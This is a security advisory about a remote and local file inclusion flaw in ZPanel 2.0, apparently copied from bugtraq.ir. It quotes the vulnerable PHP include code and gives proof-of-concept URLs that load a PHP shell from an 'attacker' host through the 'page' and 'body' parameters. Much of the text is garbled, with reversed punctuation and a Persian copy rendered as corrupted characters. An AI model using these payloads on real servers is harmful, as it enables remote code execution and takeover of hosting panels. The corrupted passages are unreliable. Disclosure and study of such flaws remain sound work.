Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
:!"#$%
http://www.thezpanel.com
http://www.zee-way.com
http://forge.novell.com/modules/xfmod/project/?zpanel
:Credit
The information has been provided by Hamid Ebadi
The original article can be found at : http://www.bugtraq.ir
:Vulnerable Systems
(Version: ZPanel 2.0 (and below
( also tested on ZPanel-v25-BETA11)
:Description
Input passed to the "page" parameter in "zpanel.php" and "body" parameter in
."templates/ZPanelV2/template.php" isn't properly verified, before it is used to include files
.This can be exploited to include arbitrary files from remote and local resources
: Vulnerable Code
http://[host]/ZPanel/zpanel.php
zpanel.php line : 21 //
}((['if (!isset($_GET['page
;"body = "main.php$
}else {
;"body = $_GET['page'] . ".php$
{
... //
line : 38 //
Loading template//
;['templatefolder = $row_Config['template$
;('include('templates/'.$templatefolder.'/template.php
http://[host]/ZPanel/templates/ZPanelV2/template.php
template.php //
line : 63 //
: POC exploit
?http://[host]/ZPanel/zpanel.php?page=http://attacker/phpshell.txt
?http://[host]/ZPanel/templates/ZPanelV2/template.php?body=http://attacker/phpshell.txt
http://www.bugtraq.ir #
. FP#* 1% 17<I7 د45#Q <5ار از آدرس زL6<م اN R5رد ا8% < درI,9* ت#STUا
http://www.thezpanel.com
http://www.zee-way.com
http://forge.novell.com/modules/xfmod/project/?zpanel
. FDIWG <5=: >97" آ#XIY*& ا#,Z +[S &* L9N 1[\Q ی#G &VWN
: ت#'9]8Z
^9: "templates/ZPanelV2/template.php " " درbody" _D`XG " وzpanel.php " " درpage " <I%را#: ورودی
. FN8P 1XN 17 *<ر1IaD%ظ ا#'E > از7#D% رت8c* 45#6 +789: از
&C FP#* 1% (<ور7) 1[3 و دا12ر#3 d*#D% اه از8VEي د#G 45#6 +789: &* در#Q <ي5=: >97 آR5& *& ا28Z #* <-ذ8(N
.د8P 1% hG<ا6 <-ذ8(N اه *<ای8VE<ب دV% ی#G FC <ا2زه ا#2 ا+E#Y R5در ا
http://[host]/ZPanel/zpanel.php
zpanel.php line : 21 //
}((['if (!isset($_GET['page
;"body = "main.php$
}else {
;"body = $_GET['page'] . ".php$
{
... //
line : 38 //
Loading template//
;['templatefolder = $row_Config['template$
;('include('templates/'.$templatefolder.'/template.php
http://[host]/ZPanel/templates/ZPanelV2/template.php
template.php //
line : 63 //
-1
?http://[host]/ZPanel/zpanel.php?page=http://attacker/phpshell.txt
?http://[host]/ZPanel/templates/ZPanelV2/template.php?body=http://attacker/phpshell.txt -2
.FP#* 1% ظ8('% ل#I9k5 د+9D%& اN#7ق *<ای ر8$Y 1%#XZ ه وFP m,C دی#\S F9XY n78Z <ی5=: >97 آR5ا
دی#\S F9XY